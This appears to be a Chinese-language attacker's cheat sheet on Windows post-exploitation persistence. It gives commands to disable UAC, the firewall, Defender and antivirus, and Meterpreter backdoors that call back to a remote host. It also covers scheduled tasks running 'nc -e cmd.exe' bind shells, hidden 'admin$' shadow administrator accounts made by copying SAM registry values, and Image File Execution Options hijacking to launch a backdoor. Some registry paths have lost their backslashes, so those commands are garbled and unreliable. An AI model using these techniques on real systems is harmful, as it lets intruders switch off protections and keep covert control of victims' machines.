2019-12-17：权限维持，笔记

关掉UAC
reg.exe add HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem EnableLUA /t REG_DWORD /d 0 /f
关掉防火墙
netsh firewall set opmode disable
netsh advfiirewall set allprofiles state off
关闭Denfender
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
权限维持
msf
1，meterpreter后门，metsvc，通过服务启动方式，run metsvc -A 设置端口，上传后门文件，隐蔽性不高，容易看到
2，meterpreter后门，persistence，通过启动项启动 run persistence -A -X -U -i 时间秒 -p 端口 -r 远程主机ip

scheduleme和schtasksabuse是通过利用计划任务启动
meterpreter> run scheduleme -m 1 -e /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
# 上传nc并创建计划任务每一分钟执行一次'nc -e cmd.exe -L -p 8080'
meterpreter> run schtasksabuse -t 192.168.2.7 -c "cmd /c calc.exe" -d 30
# 每隔30秒执行一次calc.exe

run scheduleme -m 1 -e /tmp/nc.exe -o "-e cmd.exe -L -P 9999"

影子账户
1、用'$'创建匿名用户，并加到administrator组
cmd> net user admin$ 123456 /add
cmd> net localgroup administrators admin$ /add
2、导出匿名用户对应的sam目录下的注册表键值
cmd> regedt32.exe
打开HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers键值，然后找到admin$对应的类型以及文件夹，以及administrator对应的文件夹，将administrator文件夹中的F值内容复制到admin$对应文件夹F值中。
PS：注意Sam键值在属性中给予administrator完全控制以及读取的权限，默认是不允许的
3、删除匿名用户
cmd> net user admin$ /del
4、还原匿名用户
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesadmin$
双击导出的注册表文件，用先前导出的注册表键值对注册表进行修改，就可以重新还原之前的匿名用户
SAM下没有值的话
两种方法可以看到要找的子键：
方法一：对着SAM子项右键-权限-高级-选中Administartors后点编辑-在对应“完全控制”的“允许”复选框里打上勾，一路确定下去。
方法二：在开始-运行里输入cmd /k sc config Schedule start= auto&&sc start Schedule&&at 9:00 /interactive "c:windows egedit.exe"，回车后，打开“开始”-所有程序-附件-系统工具-任务计划，在新增加的任务计划上右击-运行，即可打开以System帐户运行的注册表编辑器，直接查找，亦可查看你要找的子项。

映像劫持（IFEO）
1 命令行：
# reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options otepad.exe" GlobalFlag /t REG_DWORD /d 512
# reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options otepad.exe" ReportingMode /t REG_DWORD /d 1
# reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExit otepad.exe" MonitorProcess /t REG_SZ /d "c:windowssystem32calc.exe（这个路径值为要执行的后门）"
2，使用Debugging Tools里的gflags.exe程序，在silent process exit里，添加要关联的程序，勾选Enable silent process exit monitoring，添加要
抓取的后门程序